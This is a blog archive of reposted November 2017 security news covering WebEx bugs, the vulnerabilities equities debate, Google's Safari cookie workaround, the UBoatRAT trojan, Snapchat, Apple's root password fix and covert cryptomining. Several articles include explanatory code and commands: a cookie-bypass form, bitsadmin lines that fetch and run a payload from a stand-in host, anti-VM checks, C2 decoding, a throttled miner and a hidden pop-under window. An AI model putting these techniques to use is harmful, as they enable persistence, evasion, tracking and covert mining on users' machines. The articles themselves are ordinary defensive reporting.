Monthly Archives: November 2017

Cisco Patches Critical Playback Bugs in WebEx Players

Cisco Systems issued a Critical alert on Wednesday warning of multiple vulnerabilities in its popular WebEx player. Six bugs were listed in the security advisory, each of them relating to holes in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files.

“A remote attacker could exploit these vulnerabilities by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file,” according to Cisco.

Cisco warned exploitation of the vulnerabilities could allow arbitrary code execution on a targeted system. In less severe cases, the vulnerabilities could cause players to crash.

Vulnerable products include:

  • Cisco WebEx Business Suite (WBS30) client builds prior to T30.20
  • Cisco WebEx Business Suite (WBS31) client builds prior to T31.14.1
  • Cisco WebEx Business Suite (WBS32) client builds prior to T32.2
  • Cisco WebEx Meetings with client builds prior to T31.14
  • Cisco WebEx Meeting Server builds prior to 2.7MR3

No workarounds are available for any of the vulnerabilities, but Cisco has released software updates that address the bugs. It added that the Cisco Product Security Incident Response Team is not aware of any public exploits of the six vulnerabilities.

The vulnerabilities impact the Cisco WebEx ARF Player and the Cisco WebEx WRF Player, both used to play back previously recorded WebEx meetings. Cisco said the players are installed automatically when a user attempts to play back a meeting saved on a WebEx server.

As part of its mitigation, Cisco said it has updated Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and the Cisco WebEx ARF and WRF Players.

The Common Vulnerabilities and Exposures (CVE) identifiers are CVE-2017-12367, CVE-2017-12368, CVE-2017-12369, CVE-2017-12370, CVE-2017-12371 and CVE-2017-12372. Each of the CVEs carries a severity base score of 9.6 out of 10.

Four of the six CVEs cover critical remote code execution vulnerabilities. CVE-2017-12367 is tied to a denial-of-service vulnerability, and CVE-2017-12369 is tied to a Cisco WebEx Network Recording Player out-of-bounds vulnerability.

“To exploit these vulnerabilities, the player application would need to open a malicious ARF or WRF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using email), or by directing a user to a malicious web page. The vulnerabilities cannot be triggered by users who are attending a WebEx meeting,” Cisco said.

In July, Cisco also updated its WebEx browser extensions for Chrome and Firefox after Google Project Zero researcher Tavis Ormandy and Divergent Security’s Cris Neckar privately disclosed a vulnerability that could be abused to remotely run code on a computer running the browser extension.

from Threatpost – English – Global – thr… http://bit.ly/2Boy8wJ
via IFTTT

The Critical Difference Between Vulnerabilities Equities & Threat Equities

Why the government has an obligation to share its knowledge of flaws in software and hardware to strengthen digital infrastructure in the face of growing cyberthreats.

In mid-November, Rob Joyce, the White House cybersecurity coordinator, released a set of documents about the “vulnerabilities equities process,” about which he wrote in a recent White House blog post:

At the same time, governments must promote resilience in the digital systems architecture to reduce the possibility that rogue actors will succeed in future cyber attacks. This dual charge to governments requires them to sustain the means to hold even the most capable actor at risk by being able to discover, attribute, and disrupt their actions on the one hand, while contributing to the creation of a more resilient and robust digital infrastructure on the other. Obtaining and maintaining the necessary cyber capabilities to protect the nation creates a tension between the government’s need to sustain the means to pursue rogue actors in cyberspace through the use of cyber exploits, and its obligation to share its knowledge of flaws in software and hardware with responsible parties who can ensure digital infrastructure is upgraded and made stronger in the face of growing cyber threats. 

This is a valuable step in the right direction, and the people behind it worked hard to make it happen. However, the effort doesn’t go far enough, and those of us in the security industry have an urgent need to go further to achieve the important goals that Joyce lays out: improving our defenses with knowledge garnered by government offensive and defensive operations.

This is intended as a nuanced critique: I appreciate what’s been done. I appreciate that it was hard work, and that the further work will be even harder. And it needs to be done.

The heart of the issue is our tendency in security to want to call everything a “vulnerability.” The simple truth is that attackers use a mix of vulnerabilities, design flaws, and deliberate design choices to gain control of computers and to trick people into disclosing things like passwords. For example, in versions of PowerPoint up to and including 2013, there was a feature where you could run a program when someone “moused over” a picture. I understand that feature is gone in the latest Windows versions of PowerPoint but still present in the Mac version. I use this and other examples just to make the issues concrete, not to critique the companies. 

This is not a vulnerability or a flaw. It’s a feature that was designed in. People designed it, coded it, tested it, documented it, and shipped it. Now, can an attacker reliably “weaponize” it by shipping it with a script in a zip file, for example, by referring to a UNC path to \\example.org\very\evil.exe? I don’t know. What I do know is that the process as published and described by Joyce explicitly excludes such issues. As stated in the blog post:

The following will not be considered to be part of the vulnerability evaluation process:

    • Misconfiguration or poor configuration of a device that sacrifices security in lieu of availability, ease of use or operational resiliency.
    • Misuse of available device features that enables non-standard operation.
    • Misuse of engineering and configuration tools, techniques and scripts that increase/decrease functionality of the device for possible nefarious operations.
    • Stating/discovering that a device/system has no inherent security features by design.

These issues are different from vulnerabilities. None of them is a bug to fix. I do not envy the poor liaison who gets to argue with Microsoft were this feature to be abused, nor the poor messenger who had to try to convince Facebook that their systems were being abused during the elections. However senior that messenger, it’s a hard battle to get a company to change its software, especially when customers or revenue are tied to it. I fought that battle to get Autorun patched in shipped versions of Windows, and it was not easy.

However, the goal, as stated by Joyce, does not draw a natural line between vulnerabilities, flaws, and features. If our goal is to build more resilient systems, then we need to start by looking at the issues that happen – all of them – and understanding them. We can’t exclude the ones that, a priori, are thought to be hard to fix, nor should we let a third party decide what’s hard to fix.

The equities process should be focused on government’s obligation to share its knowledge of flaws in software and hardware with responsible parties who can ensure digital infrastructure is upgraded and made stronger in the face of growing cyberthreats. Oh, wait, those are their words, not mine. And along the way, “flaws” gets defined down to vulnerabilities.

At the same time, our security engineering work needs to move beyond vulnerability scanning and pen tests to become comprehensive, systematic, and structured. We need to think about security design, the use of safer languages, better sandboxes, and better dependency management. We need to threat model the systems we’re building so that they have fewer surprises.

That security engineering work will reduce the number of flaws and exploitable design choices. But we’ll still have clever attackers, and we need the knowledge that’s gained from attack and defense to flow to software engineers in a systematic way. A future threats equities process will be a part of that, and industry needs to ask for it to be sooner rather than later.

Adam is an entrepreneur, technologist, author and game designer. He’s a member of the BlackHat Review Board, and helped found the CVE and many other things. He’s currently building his fifth startup, focused on improving security effectiveness, and mentors startups as a …

from Dark Reading – All Stories http://ubm.io/2ApRh4l
via IFTTT

Google sued over iPhone ‘Safari Workaround’ data snooping

Did you use an iPhone in the UK between 1 June 2011 and 15 February 2012?

If you did, you’re one of an estimated 5.4 million people who might one day be in line for a compensation payment from Google over a long-running controversy known as the “Safari Workaround”.

The legal barebones are that a campaign group called Google You Owe Us has launched a “representative action” (similar to a class action in the US) alleging that the search giant:

Took our data by bypassing default privacy settings on the iPhone Safari browser which existed to protect our data, allowing it to collect browsing data without our consent.

Specifically, Google used a bit of JavaScript code – the workaround – to bypass Safari’s default blocking of third-party cookies (set by domains other than those being visited) in order to allow sites within its DoubleClick ad network to track users.
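
The mechanics, as later documented by researchers and regulators, relied on a quirk in Safari’s old cookie policy: a third-party domain could set cookies once the user had “interacted” with it, and a form submitted by script counted as an interaction. Here is a minimal TypeScript sketch of that pattern; the domain and endpoint are hypothetical, and this illustrates the published technique rather than Google’s actual code:

    // Sketch of the invisible-form trick (hypothetical endpoint).
    // Old Safari treated a form submission to a third-party domain as a
    // user interaction, after which that domain's cookies were accepted.
    const sink = document.createElement("iframe");
    sink.name = "cookie_sink";
    sink.style.display = "none";
    document.body.appendChild(sink);

    const form = document.createElement("form");
    form.method = "POST";
    form.action = "https://ads.example.net/set-cookie"; // hypothetical ad-network URL
    form.target = "cookie_sink";                        // submit into the hidden iframe
    document.body.appendChild(form);
    form.submit(); // scripted submit; the user never clicks anything

Once the response to that scripted POST set a cookie, Safari treated the ad domain as one the user had chosen to interact with, and subsequent tracking cookies went through.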

This was despite Google giving assurances that this would not happen to users running Safari with its default privacy settings.

The case involves Safari because it was a browser that by default imposed restrictions on the cookies set by ad networks.

By this point, some US readers might be feeling a sense of déjà vu – all over again.

The origins of the British case lie with the discoveries made by a Stanford University researcher called Jonathan Mayer in 2012, which eventually led to legal cases brought by the Federal Trade Commission (FTC) and 38 US states in 2012 and 2013; these concluded with Google paying fines of $22.5m (then £15m) and $17m respectively.

Google’s defence has always been that the feature was designed to allow Safari users who’d signed into Google, and opted to see personalised content, to interact with features such as the company’s Google+ button or Facebook likes.

In 2012 it said:

To enable these features, we created a temporary communication link between Safari browsers and Google’s servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalisation.

Which seemed like a way of saying that internet services, and people’s interactions with them, were getting so complex that the strict lines of privacy and consent were blurring.

The latest UK case will, essentially, see these arguments re-run with a few more years’ hindsight to sharpen the case on both sides.

It’s not the first UK Safari workaround case Google has had to fight: in 2015 the Court of Appeal ruled that the issue had enough merit to allow the litigants involved to sue the company (a case that was reportedly settled out of court).

As for iOS users who might qualify for any settlement, there are conditions.

Assuming you were using Safari on a lawfully-acquired iPhone, and didn’t opt out of seeing Google’s personalised ads, you must have been resident in England or Wales both during the period covered by the case, and on 31 May 2017 (Scotland has a separate legal system and isn’t covered).

How users prove this years after the event is not clear, but having used an Apple ID with an iPhone during the period mentioned will probably be enough.

The case is specifically about iPhone users and doesn’t include iPads and OS X computers. Naked Security understands this is for legal reasons (including additional devices complicates matters even though they might also have been affected).

Is this just a dose of bad publicity about mistakes long past?

The possibility of pay-outs from a company like Google will grab headlines, but in the UK in 2017 this has become about deeper issues. As Google You Owe Us states:

Together, we can show the world’s biggest companies are not above the law.

Recently, sentiment has turned against large tech companies for a variety of reasons, including attitudes to privacy, the alleged non-payment of taxes, and the popular perception that some companies have become too big for their boots.

It’s a seeming paradox that describes our age. Millions of us use Google’s software, yet for some at least this is building not love and respect, but suspicion.


from Naked Security – Sophos http://bit.ly/2iqfmkD
via IFTTT

RAT Distributed Via Google Drive Targets East Asia

Researchers said that they are tracking a new remote access Trojan dubbed UBoatRAT that is targeting individuals or organizations linked to South Korea or the video game industry.

While the targets aren’t 100 percent clear, researchers at Palo Alto Networks Unit 42 said UBoatRAT is evolving and new variants are growing more sophisticated. They said recent samples found in September have adopted new evasion techniques and novel ways to maintain persistence on PCs.

“We don’t know the exact targets at the time of this writing. However, we theorize the targets are personnel or organizations related to Korea or the video games industry,” wrote Kaoru Hayashi, cyber threat intelligence analyst at Palo Alto Networks in a technical write-up of Unit 42’s research published this week. “We see Korean-language game titles, Korea-based game company names and some words used in the video games business on the list.”

UBoatRAT was first identified by Unit 42 in May 2017. At the time, UBoatRAT utilized a simple HTTP backdoor and connected to a command-and-control server via a public blog service in Hong Kong and a compromised web server in Japan. By September, the RAT had evolved to adopt Google Drive as a distribution hub for the malware and to use URLs that connect to GitHub repositories acting as a C2. UBoatRAT also leverages the Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence on targeted systems.

BITS is a Microsoft service for transferring files between machines, most widely known for its use by Windows Update and third-party software for application updates. The service has a long history of being abused by attackers, dating back to 2007, and it remains attractive to hackers today because the Windows component can retrieve or upload files using an application trusted by host firewalls. Last year, researchers identified hackers who used a BITS “notification” feature to deliver malware and maintain system persistence.

With UBoatRAT, adversaries are using the BITS binary Bitsadmin.exe as a command-line tool to create and monitor BITS jobs, researchers said. “The tool provides the option, /SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot,” they said.
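
To make that concrete, here is roughly what BITS-based persistence looks like in general, using bitsadmin’s documented switches; the job name, URL and paths are illustrative, not the actual values recovered from UBoatRAT:

    bitsadmin /create updatejob
    bitsadmin /addfile updatejob https://example.org/payload.exe C:\Users\Public\payload.exe
    bitsadmin /SetNotifyCmdLine updatejob C:\Users\Public\payload.exe NULL
    bitsadmin /resume updatejob

Because BITS jobs survive reboots and the notification command fires when the transfer completes or errors out, the payload can keep being re-executed without leaving a Run key or scheduled task for defenders to find.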

According to researchers, UBoatRAT is being delivered to targets via URLs that link to executable files or Zip archives hosted on Google Drive. “The zip archive hosted on Google Drive contains the malicious executable file disguised as a folder or a Microsoft Excel spread sheet. The latest variants of the UBoatRAT released in late July or later masquerade as Microsoft Word document files,” researchers said.

If the files are executed, UBoatRAT attempts to determine whether the targeted system is part of a larger corporate network or a home PC by checking whether the machine belongs to an Active Directory domain, which is typical of business PCs. The malware is also programmed to detect virtualization software (VMware, VirtualBox or QEMU) that would indicate a research environment.

If these host conditions aren’t met, UBoatRAT generates one of various fake Windows system error messages and quits.
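
As a rough illustration of what such checks look like in practice, here is a generic TypeScript sketch (run under Node on Windows); it is not UBoatRAT’s decompiled logic, and the fake error text is invented for the example:

    // Generic host profiling: is the machine AD-joined, and is it a VM?
    import { execSync } from "child_process";

    const domainInfo = execSync("wmic computersystem get partofdomain").toString();
    const inDomain = /TRUE/i.test(domainInfo); // domain-joined machines report TRUE

    const hardware = execSync("wmic computersystem get manufacturer,model").toString();
    const looksVirtual = /vmware|virtualbox|qemu/i.test(hardware);

    if (!inDomain || looksVirtual) {
      // Mimic the reported behaviour: show a fake error, then quit.
      console.error("Error: a required system component is missing."); // invented message
      process.exit(1);
    }

Home PCs typically fail the domain check, and common hypervisors advertise themselves in the reported manufacturer and model strings, which is what makes both checks cheap for malware to run.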

Communication with the command-and-control server relies on a C2 address hidden in a file the RAT retrieves, researchers said.

“The attacker behind the UBoatRAT hides the C2 address and the destination port in a file hosted on Github… After establishing a covert channel with C2, the threat waits following backdoor commands from the attacker,” the researchers wrote.

The backdoor commands include checking whether the RAT is alive, starting a CMD shell, and uploading files to the compromised machine.

The malware gets its name from the way it decodes the characters in the file retrieved from the GitHub URL.

“The malware accesses the URL and decodes the characters between the string ‘[Rudeltaktik]’ and character ‘!’ using BASE64. ‘Rudeltaktik’ is the German military term which describes the strategy of the submarine warfare during the World War II,” researchers said.
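
In other words, the loader fetches the file, slices out whatever sits between the marker and the exclamation mark, and Base64-decodes the result into a host and port. A minimal TypeScript sketch of that decoding step, with made-up file contents:

    // Recover a C2 address hidden between "[Rudeltaktik]" and "!".
    function extractC2(fileText: string): string {
      const marker = "[Rudeltaktik]";
      const start = fileText.indexOf(marker) + marker.length;
      const end = fileText.indexOf("!", start);
      const encoded = fileText.slice(start, end);
      return Buffer.from(encoded, "base64").toString("utf8");
    }

    // Hypothetical example: decodes to "host.example:443"
    console.log(extractC2("junk [Rudeltaktik]aG9zdC5leGFtcGxlOjQ0Mw==! junk"));

Because the encoded address can be swapped out on GitHub at any time, the attacker can move the C2 without updating the malware itself.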

Since June, the GitHub “uuu” repository the C2 links to has been deleted and replaced by “uj”, “hhh” and “enm”, according to researcher Hayashi. The GitHub user name behind the repositories is “elsa999”.

“Though the latest version of UBoatRAT was released in September, we have seen multiple updates in elsa999 accounts on GitHub in October. The author seems to be vigorously developing or testing the threat. We will continue to monitor this activity for updates,” Hayashi said.

from Threatpost – English – Global – thr… http://bit.ly/2BzJMWa
via IFTTT

Snapchat takes a swipe at fake news

Here’s the problem with social media echo chambers: they contain the opinions of other people!

Snapchat wants to fix that. It’s working on a redesign that strips the social from media, separating friends and family updates in one section of the screen and putting media – as in, vetted news from publishers, stories from around the world, or stories from people you follow but don’t know personally – in another spot, in a “Discover” page.

It’s also changed the way you’ll view your friends’ updates. Snapchat says its new “sophisticated Best Friends algorithm” chooses which friends you see the most of, based on the way you communicate with them.

As always, the app will open to the camera. On the left of the screen will be friends’ chats and stories, and on the right of the camera will be Stories from publishers, creators, and the community.

Both the Friends slot and the Discover page will over time learn what you like and which friends you really want to talk to.

The redesign is intended to promote more intimate sharing among friend groups while pushing professionally produced content into a separate feed.

We’ll see the redesign starting this week as it’s rolled out for a small test group. It’s expected to roll out more broadly in coming weeks.

In a blog post, Snapchat said that the way that social media has mixed friends with brands has been “an interesting internet experiment,” but it’s one that’s had some “strange side-effects,” such as fake news:

While blurring the lines between professional content creators and your friends has been an interesting internet experiment, it has also produced some strange side-effects (like fake news) and made us feel like we have to perform for our friends rather than just express ourselves.

In an opinion piece posted by Axios on Wednesday morning, Snapchat CEO Evan Spiegel said that social media has fueled fake news because…

…content designed to be shared by friends is not necessarily content designed to deliver accurate information. After all, how many times have you shared something you’ve never bothered to read?

Snapchat’s solution to the fake news dilemma is to base algorithms on a user’s interests – not on the interests of “friends” – and to make sure media companies also profit off the content they produce for Snapchat’s Discover platform.

We think this helps guard against fake news and mindless scrambles for friends or unworthy distractions.

In order to personalize the Stories created by publishers – as in, those that aren’t curated by friends – Snapchat is taking a page from what Netflix does: it uses machine learning algorithms to recommend content based on what subscribers have watched in the past.

Research shows that your own past behavior is a far better predictor of what you’re interested in than anything your friends are doing. This form of machine learning personalization gives you a set of choices that does not rely on free media or friend’s recommendations and is less susceptible to outside manipulation.

Spiegel went into the same kind of soul-searching as other social media moguls who’ve been oops!-ifying in these days of the Congressional investigation into Russian trolls planting fake news… and of the people who created the industry stepping back to question the repercussions, such as Facebook “like” button co-creator Justin Rosenstein and former Facebook product manager Leah Pearlman, who have both implemented measures to curb their social media dependence

…and of Facebook ex-president Sean Parker doing his own “what were we thinking?” last week, when he told Axios that from the start, social media engineers have been knowingly exploiting a vulnerability in human psychology to get us all addicted to social validation feedback loops and their sweet, sweet dopamine jolts… and of Loren Brichter, designer of the pull-to-refresh tool first seen in the Twitter app, also admitting that the social media platform and the tool he created are addictive.

For his part, Spiegel says that personalized newsfeeds have “revolutionized the way people share and consume content,” but the collateral damage has included “a huge cost to facts, our minds and the entire media industry.”

While combining social and media has meant big bucks, it’s “ultimately undermined our relationships with our friends and our relationships with the media,” Spiegel says.

Snapchat thinks the best path out of this fake news craziness is to disentangle social and media, provide a personalized content feed based on what subscribers want to watch and not what your echo-chamber friends post, and to build content feeds on top of human-curated content, rather than just any old globs that pop to the surface of the internet.

Spiegel:

Curating content in this way will change the social media model and also give us both reliable content and the content we want.


from Naked Security – Sophos http://bit.ly/2zQP02G
via IFTTT

Apple’s “blank root password” fix needs a fix of its own – here it is

If you’ve ever been hiking in California’s High Sierra, you’re probably in awe not only of its spectacular nature but also of its many, tricky, rocky pathways.

It’s beautiful but it can bite you.

That’s pretty much how Apple must be feeling this week about its own High Sierra, the tradename of its latest 10.13 version of macOS.

News broke early in the week that the macOS authentication dialog could be used to trigger an all-but-unbelievable elevation-of-privilege vulnerability.

We’re calling it the “blank root password” bug.

The bug explained

Not just anyone can make critical configuration changes on your Mac, such as turning off the firewall or decrypting your hard disk.

Many changes need to be authorised by a user with Administrator privileges – and even if you’re already logged in with an Admin account yourself, you need to authenticate again every time you want to do something administrative.

That’s why many System Preferences panes, for example, feature a padlock you have to click if you want to make changes.

Turns out that if you changed the User Name field to root, the all-powerful superuser account that is never supposed to be used directly, and entered a blank password once…

…then the root password somehow actually ended up changed to a blank password, so that when you entered a blank password for the root account thereafter, it Just Worked.

Quite what sort of coding bug led to the bizarre situation that testing a password ended up modifying that password is something Apple isn’t saying.

As security blunders go, however, it’s a bit like giving an immigration officer a false date of birth, only to find out, when he opens your passport to catch you out in the middle of your lie, that your passport has miraculously reissued itself with your “new” birthday.

Faster and faster

Four years ago, Apple notoriously took more than six months to fix an authentication vulnerability in the sudo command, the program that sysadmins rely upon to maintain the security of privileged administrative tasks performed at a command prompt.

But Apple has come a long way in responsiveness since then, and this week’s “blank root password” bug was patched within about one day by the new-look Apple.

We wrote about the patch yesterday afternoon and wholeheartedly said, “Well done to Apple for acting quickly.”

When we said those words, we were well aware that such a rapidly-issued patch might have unintended side-effects, especially when the changes involved a system component associated with password verification and administrative authentication.

We wondered to ourselves whether Apple’s patch might end up with some system features inadvertently de-authenticated…

…but we said “Well done” to Apple anyway.

We figured that, in most cases, requiring some legitimate users to re-authenticate is far better than letting any crooks wander in unauthenticated.

And we stand by those words even now we know that there has been at least one “inadvertent de-authentication” problem caused by yesterday’s patch, a side-effect that could stop file sharing working on your Mac:

If file sharing doesn’t work after you install Security Update 2017-001, follow these steps. 

[. . .]

1. Open the Terminal app, which is in the Utilities folder of your Applications folder.
2. Type sudo /usr/libexec/configureLocalKDC and press Return. 
3. Enter your administrator password and press Return.
4. Quit the Terminal app. 

The command above, /usr/libexec/configureLocalKDC, isn’t needed often – it’s used to set up what’s known as a Kerberos Key Distribution Centre (KDC). (The prefix sudo tells macOS to run the configureLocalKDC command with Administrator privileges, which is why you need your admin password.)

The good news is that you don’t have to know exactly what that means – but, greatly simplified, Kerberos is the authentication system used for Windows-style file sharing, and the KDC is the background process that is responsible for checking that you’re authorised to use the shares you try to access.

Configuring this KDC thing is usually done for you, handled automatically when you set up your Mac; after yesterday’s emergency “blank root password” update, the KDC needs to be configured again, and that means you need to provide an administrative password to complete the task.

It’s unfortunate that this happened, but the fix for the fix is pretty simple: we think that if you can launch a mail application and paste text into the subject line of a new email, you’ll have little or no trouble with this one.

So we’re repeating our “Well done” to Apple for getting a fix out quickly.

The “blank root password” bug was publicly disclosed, which pretty much forced Apple’s hand to respond at once, and it did.

Some of us will need to put in our admin passwords to get file sharing working again, in return for all of us being rapidly protected against a widely-publicised security hole.

As far as “taking one for the team” goes, we’re comfortable with the balance in this case.


from Naked Security – Sophos http://bit.ly/2BzsYic
via IFTTT

Stealthy in-browser cryptomining continues even after you close window

In-browser cryptocurrency mining is, in theory, a neat idea: make users’ computers “mine” Monero for website owners so they don’t have to bombard users with ads in order to earn money.

Unfortunately, in this far-from-ideal world of ours, mining scripts – first offered by Coinhive but soon after by other outfits – are mostly used by unscrupulous web admins and hackers silently compromising websites.

A lucrative enterprise

As ad-blocking services and antivirus vendors began blocking Coinhive’s original script, the developers created a new API that prevents website owners from forcing the cryptomining onto their visitors without their permission.

But, as the initial API has yet to be retired, it’s not shocking that it’s still much more popular and widespread than the second one.

AdGuard researchers recently found 33,000 websites running cryptojacking scripts, and 95% of them run the Coinhive script.

“We estimate the joint profit at over US $150,000 per month. In case of Coinhive, 70% of this sum goes to the website owner, and 30% to the mining network,” they noted.

That’s $45,000 per month for Coinhive (its 30% cut), and over half a million dollars a year if the situation were to remain unchanged. This is also the most likely reason why Coinhive has not retired the original miner script.

Keeping those browsers mining

But, as adblockers and some AV vendors ramp up their efforts to block cryptojacking scripts from running, the crooks have to come up with new ways to keep the scripts unnoticed. They are also testing new ways of keeping browsers open and mining even after users leave the mining website.

Malwarebytes’ researchers detailed one of these efforts, which involves covert pop-under windows, throttled mining, and an ad network that works hard at bypassing adblockers.

The “attack” unfolds like this: the user visits a website that silently loads cryptomining code and starts mining, but throttles it so that the user’s CPU power is not used up completely. This prevents the machine from slowing down and heating up, and makes it more likely that the user won’t notice the covert mining.
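
Notably, throttling requires nothing exotic: it is a first-class option in Coinhive’s documented client API. A short sketch using that public interface, with a placeholder site key:

    // Coinhive's documented API: "throttle" is the fraction of time the
    // miner idles, so 0.7 leaves only ~30% of CPU time spent hashing.
    declare const CoinHive: any; // provided by the coinhive.min.js script tag
    const miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER", { throttle: 0.7 });
    miner.start();

A fully loaded CPU is what users (and support desks) notice first, so dialing the miner down is a small price for staying resident much longer.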

But, when the user leaves the site and closes the browser window, another browser window remains open, made to hide under the taskbar, and continues mining.
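
The pop-under itself is plain browser scripting: as the visible window goes away, a tiny window is opened with coordinates that land it behind the Windows taskbar. A simplified TypeScript sketch of the geometry trick Malwarebytes describes, with an illustrative URL and offsets:

    // Open a small window past the bottom-right of the usable desktop,
    // where it ends up tucked behind the taskbar on default Windows themes.
    window.open(
      "https://miner.example/mine.html", // hypothetical page carrying the miner
      "under",
      `width=120,height=50,left=${screen.availWidth - 120},top=${screen.availHeight + 50}`
    );

Because the window technically remains open, the mining script inside it keeps running even though, to the user, the browser appears to be closed.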

“If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up,” Malwarebytes researcher Jerome Segura explained.

The rogue pop-under window can then be closed and the mining stopped. Unfortunately, too many users won’t notice it, or won’t notice for a while that their computer has become somewhat sluggish.

“This type of pop-under is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself,” Segura noted.

“The more technical users will want to run Task Manager to ensure there is no remnant running browser processes and terminate them. Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running.”

The researchers tested the scheme by using the latest version of the Google Chrome browser on Windows. Results may vary with other browsers and other operating systems.

Chrome developers have been debating whether the browser should block or flag CPU mining attempts since early September, but a decision has still not been made.

from Help Net Security – News http://bit.ly/2ipNWve
via IFTTT